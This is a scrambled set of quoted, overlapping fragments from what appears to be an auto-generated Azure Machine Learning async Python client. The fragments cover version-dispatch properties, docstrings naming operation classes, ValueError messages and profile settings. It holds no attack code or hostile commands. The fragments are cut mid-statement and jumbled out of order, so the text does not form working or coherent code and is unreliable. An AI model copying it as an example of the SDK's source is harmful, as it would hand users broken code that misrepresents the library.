\"\"\"Instance depends on the API version: * 2021-10-01:", "{} does not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import Operations as OperationClass elif api_version == '2022-01-01-preview':", "the API version: * 2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\"", "== '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import CodeContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from", "api_version = self._get_api_version('batch_job_endpoint') if api_version == '2020-09-01-dataplanepreview': from ..v2020_09_01_dataplanepreview.aio.operations import BatchJobEndpointOperations as OperationClass", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import ModelVersionsOperations as OperationClass else:", "..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does not have", "api_version = self._get_api_version('dataset_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass", "group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def compute(self): \"\"\"Instance depends on", "from 
..v2022_05_01.aio.operations import DataContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "raise ValueError(\"API version {} does not have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config,", "import DataVersionsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance depends on the", "def datasets_v1(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetsV1Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetsV1Operations>` \"\"\" api_version", "* 1.5.0: :class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations", "from ..v2021_10_01.aio.operations import PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import", "you should stick to a particular api-version and/or profile. 
The profile sets a", "API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentContainersOperations>` * 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01:", "raise ValueError(\"API version {} does not have operation group 'async_operations'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version = self._get_api_version('data_version') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataVersionOperations as OperationClass", "as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DatastoresOperations as OperationClass elif", "* 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations", "api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import TemporaryDataReferencesOperations as OperationClass else: raise ValueError(\"API version", "import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have operation", "'2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise ValueError(\"API version {} does", "await self._client.close() async def __aenter__(self): await self._client.__aenter__() return self async def __aexit__(self, *exc_details):", 
"data_container(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DataContainerOperations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DataContainerOperations>` \"\"\" api_version =", "raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version)) return OperationClass(self._client, self._config,", "else: raise ValueError(\"API version {} does not have operation group 'data_container'\".format(api_version)) return OperationClass(self._client,", "else: raise ValueError(\"API version {} does not have operation group 'usages'\".format(api_version)) return OperationClass(self._client,", "import WorkspaceConnectionsOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import WorkspaceConnectionsOperations as", "else: raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client,", "does not have operation group 'data_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def", "'dataset_v2': '1.5.0', 'dataset_versions': '2021-10-01', 'datasets_v1': '1.5.0', 'delete': 'v1.0', 'events': 'v1.0', 'experiments': 'v1.0', 'extensive_model':", "'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def jobs(self): \"\"\"Instance depends on the", ":class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>` * 2022-02-01-preview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ComponentVersionsOperations>` * 2022-05-01: 
:class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ComponentVersionsOperations>` \"\"\" api_version = self._get_api_version('component_versions') if api_version", "2021-10-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchEndpointsOperations>` * 2022-02-01-preview: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchEndpointsOperations>` * 2022-05-01: :class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if", "'2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations", "depends on the API version: * 2021-10-01: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspacesOperations>` * 2022-01-01-preview: :class:`WorkspacesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspacesOperations>` * 2022-05-01:", "api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ModelContainersOperations as OperationClass elif api_version == '2022-05-01':", ":class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.UsagesOperations>` * 2022-05-01: :class:`UsagesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.UsagesOperations>` \"\"\" api_version = self._get_api_version('usages') if api_version == '2021-10-01': from", "..v2021_10_01.aio.operations import UsagesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import UsagesOperations", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import QuotasOperations as 
OperationClass else: raise", "def dataset_v2(self): \"\"\"Instance depends on the API version: * 1.5.0: :class:`DatasetV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetV2Operations>` \"\"\" api_version", "KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting time between", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'component_versions'\".format(api_version))", "else: raise ValueError(\"API version {} does not have operation group 'workspaces'\".format(api_version)) return OperationClass(self._client,", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'datasets_v1'\".format(api_version))", "}}, _PROFILE_TAG + \" latest\" ) def __init__( self, credential: \"AsyncTokenCredential\", subscription_id: str,", "production, you should stick to a particular api-version and/or profile. The profile sets", "API version to use if no profile is provided, or if missing in", "if api_version == 'v1.0': from ..runhistory.aio.operations import RunOperations as OperationClass else: raise ValueError(\"API", "ValueError(\"API version {} does not have operation group 'get_operation_status'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "operation group 'compute'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_call(self): \"\"\"Instance depends", "..dataset_dataplane.aio.operations import DataCallOperations as OperationClass else: raise ValueError(\"API version {} does not have", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import BatchDeploymentsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 
'run_artifacts'\".format(api_version)) return OperationClass(self._client,", "version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if api_version == '2021-10-01-dataplanepreview': from", "have operation group 'registry_management_non_workspace'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def run(self): \"\"\"Instance", "PrivateLinkResourcesOperations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import PrivateLinkResourcesOperations as OperationClass", "v1.0: :class:`DeleteOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.DeleteOperations>` \"\"\" api_version = self._get_api_version('delete') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import", "as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else:", "else: raise ValueError(\"API version {} does not have operation group 'environment_containers'\".format(api_version)) return OperationClass(self._client,", "\"\"\"Instance depends on the API version: * v1.0: :class:`EventsOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.EventsOperations>` \"\"\" api_version = self._get_api_version('events')", "import AsyncTokenCredential class _SDKClient(object): def __init__(self, *args, **kwargs): \"\"\"This is a fake class", "version to use if no profile is provided, or if missing in profile.", "not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), 
Deserializer(self._models_dict(api_version))) @property def usages(self):", ":class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.ModelVersionsOperations>` \"\"\" api_version = self._get_api_version('model_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ModelVersionsOperations", "operation group 'model_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def model_versions(self): \"\"\"Instance depends", ":class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions') if api_version == '2021-10-01': from", ":class:`DatasetControllerV2Operations<azure.mgmt.machinelearningservices.dataset_dataplane.aio.operations.DatasetControllerV2Operations>` \"\"\" api_version = self._get_api_version('dataset_controller_v2') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DatasetControllerV2Operations", "on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` * 2022-05-01: :class:`Operations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.Operations>`", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`Operations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.Operations>` * 2022-01-01-preview: :class:`Operations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.Operations>` *", "import 
BatchDeploymentsOperations as OperationClass else: raise ValueError(\"API version {} does not have operation", ":param api_version: API version to use if no profile is provided, or if", "raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "have operation group 'models'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def online_deployments(self): \"\"\"Instance", "from ..v2022_02_01_preview.aio.operations import ComponentContainersOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import JobsOperations as OperationClass else: raise", "..v2021_10_01_dataplanepreview.aio.operations import ComponentVersionsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import ComponentVersionsOperations", "raise ValueError(\"API version {} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config,", "* v1.0: :class:`MetricOperations<azure.mgmt.machinelearningservices.runhistory.aio.operations.MetricOperations>` \"\"\" api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations", "WorkspaceFeaturesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..dataset_dataplane.aio.operations import DatasetV2Operations as OperationClass else: raise ValueError(\"API version {} does not have", "component_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentVersionsOperations>` * 
2021-10-01-dataplanepreview: :class:`ComponentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentVersionsOperations>`", "OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_versions(self): \"\"\"Instance depends on the API version:", "Deserializer(self._models_dict(api_version))) @property def data_versions(self): \"\"\"Instance depends on the API version: * 2022-02-01-preview: :class:`DataVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DataVersionsOperations>`", "* 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.CodeVersionsOperations>` * 2022-02-01-preview: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.CodeVersionsOperations>` * 2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\"", "the API version: * 2021-10-01: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ModelVersionsOperations>` * 2021-10-01-dataplanepreview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ModelVersionsOperations>` * 2022-02-01-preview: :class:`ModelVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.ModelVersionsOperations>` *", "== '2021-10-01': from ..v2021_10_01.aio.operations import DatasetVersionsOperations as OperationClass else: raise ValueError(\"API version {}", "Deserializer(self._models_dict(api_version))) @property def code_versions(self): \"\"\"Instance depends on the API 
version: * 2021-10-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.CodeVersionsOperations>`", "version: * 2021-10-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.PrivateLinkResourcesOperations>` * 2022-01-01-preview: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.PrivateLinkResourcesOperations>` * 2022-05-01: :class:`PrivateLinkResourcesOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.PrivateLinkResourcesOperations>` \"\"\" api_version =", "self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass elif api_version", "api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview':", "'2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import EnvironmentContainersOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations import Operations as OperationClass else: raise ValueError(\"API version", "\"\"\" api_version = self._get_api_version('data_containers') if api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import DataContainersOperations as", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'dataset_v2'\".format(api_version)) return", "from ..v2022_05_01.aio.operations import UsagesOperations as OperationClass else: raise ValueError(\"API version {} does not", "api_version = self._get_api_version('quotas') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import QuotasOperations as OperationClass", "api_version == '2022-05-01': from ..v2022_05_01.aio.operations 
import WorkspacesOperations as OperationClass else: raise ValueError(\"API version", "definition, from KnownProfiles to dict. :type profile: azure.profiles.KnownProfiles :keyword int polling_interval: Default waiting", "not have operation group 'data_version'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_versions(self):", "else: raise ValueError(\"API version {} does not have operation group 'dataset_containers'\".format(api_version)) return OperationClass(self._client,", "'delete'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def environment_containers(self): \"\"\"Instance depends on the", "operation group 'dataset_controller_v2'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def dataset_v2(self): \"\"\"Instance depends", "== '2022-05-01': from ..v2022_05_01.aio.operations import EnvironmentContainersOperations as OperationClass else: raise ValueError(\"API version {}", "= self._get_api_version('workspaces') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import WorkspacesOperations as OperationClass elif", "Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as OperationClass", "version {} does not have operation group 'assets'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "\"\"\" api_version = self._get_api_version('environment_containers') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import EnvironmentContainersOperations as", 
"OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def batch_job_deployment(self): \"\"\"Instance depends on the API version:", "depends on the API version: * 2021-10-01: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.WorkspaceConnectionsOperations>` * 2022-01-01-preview: :class:`WorkspaceConnectionsOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.WorkspaceConnectionsOperations>` * 2022-05-01:", "sets a mapping between an operation group and its API version. The api-version", "import models return models raise ValueError(\"API version {} is not available\".format(api_version)) @property def", "\"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>` *", "a mapping between an operation group and its API version. 
The api-version parameter", "group 'data_container'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def data_containers(self): \"\"\"Instance depends on", "version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version)))", "have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def get_operation_status(self): \"\"\"Instance", ":class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import JobsOperations", "MetricOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "raise ValueError(\"API version {} does not have operation group 'temporary_data_references'\".format(api_version)) return OperationClass(self._client, self._config,", "api_version = self._get_api_version('metric') if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass", "'2022-05-01': from ..v2022_05_01.aio.operations import VirtualMachineSizesOperations as OperationClass else: raise ValueError(\"API version {} does", "APIs allow end users to operate on Azure Machine Learning Workspace resources. 
This", "self._get_api_version('extensive_model') if api_version == '1.0.0': from ..model_dataplane.aio.operations import ExtensiveModelOperations as OperationClass else: raise", "2022-05-01: :class:`CodeVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.CodeVersionsOperations>` \"\"\" api_version = self._get_api_version('code_versions') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import", "ComponentContainersOperations as OperationClass elif api_version == '2021-10-01-dataplanepreview': from ..v2021_10_01_dataplanepreview.aio.operations import ComponentContainersOperations as OperationClass", "from ..v2022_02_01_preview.aio.operations import OnlineEndpointsOperations as OperationClass elif api_version == '2022-05-01': from ..v2022_05_01.aio.operations import", "raise ValueError(\"API version {} does not have operation group 'run_artifacts'\".format(api_version)) return OperationClass(self._client, self._config,", "PrivateLinkResourcesOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "compute(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComputeOperations>` * 2022-01-01-preview: :class:`ComputeOperations<azure.mgmt.machinelearningservices.v2022_01_01_preview.aio.operations.ComputeOperations>`", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'workspace_features'\".format(api_version)) return", "Deserializer(self._models_dict(api_version))) @property def dataset_versions(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>`", "'1.5.0': from ..dataset_dataplane.aio.operations import DeleteOperations as OperationClass elif api_version == 'v1.0': from ..runhistory.aio.operations", "* 2021-10-01: 
:class:`JobsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.JobsOperations>` * 2022-02-01-preview: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.JobsOperations>` * 2022-05-01: :class:`JobsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.JobsOperations>` \"\"\" api_version = self._get_api_version('jobs')", "import Operations as OperationClass elif api_version == '2022-01-01-preview': from ..v2022_01_01_preview.aio.operations import Operations as", "batch_deployments(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.BatchDeploymentsOperations>` * 2022-02-01-preview: :class:`BatchDeploymentsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.BatchDeploymentsOperations>`", "'1.0.0', 'get_operation_status': '1.5.0', 'metric': 'v1.0', 'migration': '1.0.0', 'models': '1.0.0', 'registry_management_non_workspace': 'v1.0', 'run': 'v1.0',", "ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "{} does not have operation group 'code_containers'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "root for # license information. 
# # Code generated by Microsoft (R) AutoRest", "migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version =", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'code_versions'\".format(api_version)) return", "as OperationClass else: raise ValueError(\"API version {} does not have operation group 'events'\".format(api_version))", "from ..v2022_05_01.aio.operations import WorkspaceConnectionsOperations as OperationClass else: raise ValueError(\"API version {} does not", "else: raise ValueError(\"API version {} does not have operation group 'delete'\".format(api_version)) return OperationClass(self._client,", "def environment_containers(self): \"\"\"Instance depends on the API version: * 2021-10-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.EnvironmentContainersOperations>` * 2021-10-01-dataplanepreview:", "api_version = self._get_api_version('data_call') if api_version == '1.5.0': from ..dataset_dataplane.aio.operations import DataCallOperations as OperationClass", "* 2021-10-01-dataplanepreview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.EnvironmentVersionsOperations>` * 2022-02-01-preview: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentVersionsOperations>` * 2022-05-01: :class:`EnvironmentVersionsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentVersionsOperations>` \"\"\" api_version = self._get_api_version('environment_versions')", "'spans'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): 
\"\"\"Instance depends on the", "depends on the API version: * 2021-10-01-dataplanepreview: :class:`TemporaryDataReferencesOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.TemporaryDataReferencesOperations>` \"\"\" api_version = self._get_api_version('temporary_data_references') if", "@property def models(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`ModelsOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.ModelsOperations>` \"\"\"", "ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not have operation group", "..v2021_10_01.aio.operations import BatchEndpointsOperations as OperationClass elif api_version == '2022-02-01-preview': from ..v2022_02_01_preview.aio.operations import BatchEndpointsOperations", "self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def temporary_data_references(self): \"\"\"Instance depends on the API version: *", "ValueError(\"API version {} does not have operation group 'experiments'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "* 2022-02-01-preview: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.EnvironmentContainersOperations>` * 2022-05-01: :class:`EnvironmentContainersOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.EnvironmentContainersOperations>` \"\"\" api_version = self._get_api_version('environment_containers') if api_version ==", ":class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatastoresOperations>` * 2022-02-01-preview: :class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_02_01_preview.aio.operations.DatastoresOperations>` * 2022-05-01: 
:class:`DatastoresOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.DatastoresOperations>` \"\"\" api_version = self._get_api_version('datastores') if api_version", "if api_version == 'v1.0': from ..runhistory.aio.operations import MetricOperations as OperationClass else: raise ValueError(\"API", "have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def workspace_features(self): \"\"\"Instance", "from ..v2022_05_01.aio.operations import ComponentContainersOperations as OperationClass else: raise ValueError(\"API version {} does not", "the API version: * 2021-10-01: :class:`DatasetVersionsOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.DatasetVersionsOperations>` \"\"\" api_version = self._get_api_version('dataset_versions') if api_version ==", "{} does not have operation group 'workspace_connections'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property", "def migration(self): \"\"\"Instance depends on the API version: * 1.0.0: :class:`MigrationOperations<azure.mgmt.machinelearningservices.model_dataplane.aio.operations.MigrationOperations>` \"\"\" api_version", "API version: * 1.5.0: :mod:`dataset_dataplane.models<azure.mgmt.machinelearningservices.dataset_dataplane.models>` * 1.0.0: :mod:`model_dataplane.models<azure.mgmt.machinelearningservices.model_dataplane.models>` * v1.0: :mod:`registry_discovery.models<azure.mgmt.machinelearningservices.registry_discovery.models>` * v1.0:", "ValueError(\"API version {} does not have operation group 'batch_job_deployment'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)),", "depends on the API version: * 2021-10-01: 
:class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01.aio.operations.ComponentContainersOperations>` * 2021-10-01-dataplanepreview: :class:`ComponentContainersOperations<azure.mgmt.machinelearningservices.v2021_10_01_dataplanepreview.aio.operations.ComponentContainersOperations>` * 2022-02-01-preview:", "OperationClass else: raise ValueError(\"API version {} does not have operation group 'extensive_model'\".format(api_version)) return", "group 'dataset_versions'\".format(api_version)) return OperationClass(self._client, self._config, Serializer(self._models_dict(api_version)), Deserializer(self._models_dict(api_version))) @property def datasets_v1(self): \"\"\"Instance depends on", ":class:`BatchEndpointsOperations<azure.mgmt.machinelearningservices.v2022_05_01.aio.operations.BatchEndpointsOperations>` \"\"\" api_version = self._get_api_version('batch_endpoints') if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import BatchEndpointsOperations", "if api_version == '2021-10-01': from ..v2021_10_01.aio.operations import ComponentContainersOperations as OperationClass elif api_version ==", "ValueError(\"API version {} does not have operation group 'events'\".format(api_version)) return 